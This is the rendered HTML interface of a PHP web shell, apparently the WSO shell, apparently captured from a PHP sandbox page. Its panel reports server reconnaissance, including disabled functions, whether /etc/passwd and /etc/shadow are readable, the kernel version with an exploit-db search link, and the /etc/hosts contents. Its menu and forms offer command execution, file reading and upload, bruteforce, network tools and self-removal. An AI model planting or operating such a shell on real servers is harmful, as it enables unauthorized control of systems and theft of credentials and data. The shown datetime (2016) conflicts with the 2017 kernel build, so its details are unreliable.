name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.0 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
preferences:
264.05 ms | 417 KiB | 362 Q